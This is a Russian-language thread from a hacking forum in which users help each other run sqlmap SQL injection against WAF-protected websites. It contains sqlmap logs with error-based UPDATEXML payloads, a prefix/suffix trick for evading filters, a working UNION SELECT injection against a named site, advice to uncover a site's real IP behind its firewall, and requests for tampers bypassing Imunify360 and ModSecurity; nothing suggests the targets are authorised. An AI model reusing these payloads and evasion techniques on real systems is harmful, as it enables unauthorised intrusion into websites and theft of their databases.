HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.10.2021, 12:55
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

Цитата:
Сообщение от msk_smail  

Код:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри
не помогло(
 
Ответить с цитированием

  #2  
Старый 08.10.2021, 13:05
msk_smail
Познающий
Регистрация: 09.03.2016
Сообщений: 30
С нами: 5357846

Репутация: 0
По умолчанию

Цитата:
Сообщение от brown  

не помогло(
можно использовать сразу связку из нескольких тамперов + используй --prefix="111'/*!40222" --suffix="*/!'"

если не помогает, то определи какая waf и попробуй найти как вариант реальный ip сайта

если и это не выходит то придется вручную писать тампер
 
Ответить с цитированием

  #3  
Старый 08.10.2021, 19:13
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами: 8581933

Репутация: 0
По умолчанию

Цитата:
Сообщение от msk_smail  

можно использовать сразу связку из нескольких тамперов + используй --prefix="111'/*!40222" --suffix="*/!'"
если не помогает, то определи какая waf и попробуй найти как вариант реальный ip сайта
если и это не выходит то придется вручную писать тампер
можно разьеснительную бригаду по поводу префикс суффикс ?
 
Ответить с цитированием

  #4  
Старый 12.10.2021, 12:36
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is drop

ping 'suspicious' requests

Как можно обойти?

[08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:06:18] [CRITICAL] connection timed out to the target URL

[08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:08:19] [CRITICAL] connection timed out to the target URL

[08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WH

ERE or HAVING clause (NOT)' injectable (with --string="write")

[08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage

of switch '--drop-set-cookie' if you experience any problems during data retriev

al

[08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a fa

lse positive

[08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:10:19] [CRITICAL] connection timed out to the target URL

[08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:12:19] [CRITICAL] connection timed out to the target URL

[08:12:19] [WARNING] false positive or unexploitable injection point detected

[08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable

ваф не дает прокрутить скулю
 
Ответить с цитированием

  #5  
Старый 15.10.2021, 15:53
ex3x1
Новичок
Регистрация: 14.09.2019
Сообщений: 4
С нами: 3508886

Репутация: 0
По умолчанию

Доброго дня! К примеру знаю что в БД есть строка с почтой admin@admin.com, но имя таблицы и колонки не знаю т.к. они имеют рандомные названия типа "dfdwydponefdxb". Как выполнить поиск по всей БД и найти в какой таблице есть запись с admin@admin.com?
 
Ответить с цитированием

  #6  
Старый 30.12.2021, 22:55
sysjuk
Участник форума
Регистрация: 05.01.2012
Сообщений: 204
С нами: 7553846

Репутация: 5
По умолчанию

Доброго вечера, ребята. Актуальный вопрос, может есть готовый тампер под - Imunify360 (CloudLinux) waf, либо может взять что-то из готового и переписать?

Уж один сладкий вариант подвернулся))

Всех с наступающим Новым 2022 Годом.
 
Ответить с цитированием

  #7  
Старый 01.03.2022, 13:22
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами: 5039606

Репутация: 1
По умолчанию

Код:
Parameter: JSON #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (UPDATEXML)
    Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL
ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}

    Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D
ELIMITER_STOP]'),[RANDNUM1])
---
[12:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34
back-end DBMS: MySQL >= 5.1
[12:20:48] [INFO] fetching database names
[12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C
OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs
S'='BbsS
[12:20:49] [WARNING] the SQL query provided does not return any output
[12:20:49] [INFO] falling back to current database
[12:20:49] [INFO] fetching current database
[12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT
ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
[12:20:49] [DEBUG] performed 1 query in 0.65 seconds
[12:20:49] [CRITICAL] unable to retrieve the database names
 
Ответить с цитированием

  #8  
Старый 06.05.2022, 01:06
exe-world
Новичок
Регистрация: 06.05.2022
Сообщений: 4
С нами: 2119286

Репутация: 0
По умолчанию

Ребят помогите как запихнуть в sqlmap

есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+

работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap

руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
 
Ответить с цитированием

  #9  
Старый 06.05.2022, 02:46
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от exe-world  

Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода /threads/425295/
 
Ответить с цитированием

  #10  
Старый 06.05.2022, 11:13
eminlayer7788
Участник форума
Регистрация: 31.07.2015
Сообщений: 111
С нами: 5677526

Репутация: 1
По умолчанию

Цитата:
Сообщение от exe-world  

Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user
what MYSQL version ?

https://medium.com/@drag0n/sqlmap-ta...s-c5a3f5764cb3
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.